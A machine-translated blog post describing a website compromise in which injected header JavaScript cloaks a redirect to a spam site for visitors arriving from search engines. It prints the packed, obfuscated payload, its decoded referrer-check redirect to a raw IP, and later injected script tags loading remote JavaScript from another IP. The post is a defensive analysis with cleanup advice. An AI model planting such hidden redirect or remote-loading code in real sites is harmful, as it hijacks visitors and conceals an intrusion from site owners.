Remember the experience of automatically jumping to spinach station when the home page was tampered with

Preface #

A few days ago , Baidu search former owner's website , Suddenly found the website description It becomes the introduction of spinach station , This is a black rhythm .
Specifically, when you click to enter from the search engine , Will automatically jump to the spinach station , Directly enter the URL to access without jumping ,

screening #

All problems are under the source code , There is no hiding , Such jump , Usually in header in , This jump is fast , Sure enough , stay header Found a piece of code in , as follows

It is ENV Encrypted , It's not convenient to read .

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2.3("<4 8=\\"a\\">");2.3("d s=2.6");2.3("7(s.1(\\"9\\")>0 || s.1(\\"b\\")>0 || s.1(\\"c\\")>0 ||s.1(\\"r\\")>0 ||s.1(\\"e\\")>0 ||s.1(\\"f\\")>0 ||s.1(\\"g\\")>0 ||s.1(\\"h\\")>0 )");2.3("i.j=\\"k://l.m.n.o:p/q.5\\";");2.3("</4>");',29,29,'|indexOf|document|writeln|script|html|referrer|if|LANGUAGE|baidu|Javascript|sogou|soso|var|uc|bing|yahoo|so|location|href|http|103|37|233|13|888|bcs|sm|'.split('|'),0,{}))

After decryption

<script LANGUAGE="Javascript">;
var s=document.referrer;
if(s.indexOf("baidu")>0 || s.indexOf("sogou")>0 || s.indexOf("soso")>0 ||s.indexOf("sm")>0 ||s.indexOf("uc")>0 ||s.indexOf("bing")>0 ||s.indexOf("yahoo")>0 ||s.indexOf("so")>0 )
location.href="http://103.37.233.13:888/bcs.html";
</script>

principle #

• Get sources
• Whether the match comes from a qualified search engine
• If yes, jump to the specified page

It can be seen that the search engine matching this code basically covers the domestic mainstream ( Baidu , sogou ,360 Search for , What a horse ,uc,bing, Yahoo ), As long as you search through these browsers , Will jump to the spinach station .
And directly enter the website , Does not trigger a jump , So there is a certain degree of concealment

Solution #

• Will this period of js Just delete the code
• Check for server or program vulnerabilities , Check why it was invaded , Now the server is mined , It's also very common , After being blacked out , Pay more attention to whether it is mined

follow-up #

Found that they upgraded , Insert in the head

<script type="text/javascript" rel="nofollow" src="http://103.30.4.96:7889/js/SCur.js" ></script>

They also joined Baidu statistics

var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?9a4c62a1985e8fbd8d0ce7c1a54070d1";
  var s = document.getElementsByTagName("script")[0];
  s.parentNode.insertBefore(hm, s);
})();

document.write("<script language=\"javascript\" type=\"text/javascript\" src=\"http://103.30.4.96:7889/js/PicLeft.js\"></script>");

The principle is still the same , However, statistics are added , It may be more convenient to monitor the number of views , Jump more times , It is also convenient for them to change the control script

I sent a reminder to my former colleagues , I searched the station , There are not a few websites hacked by similar methods , Give some websites with contact information , By the way, I sent a reminder , I want to receive a thank you , result .........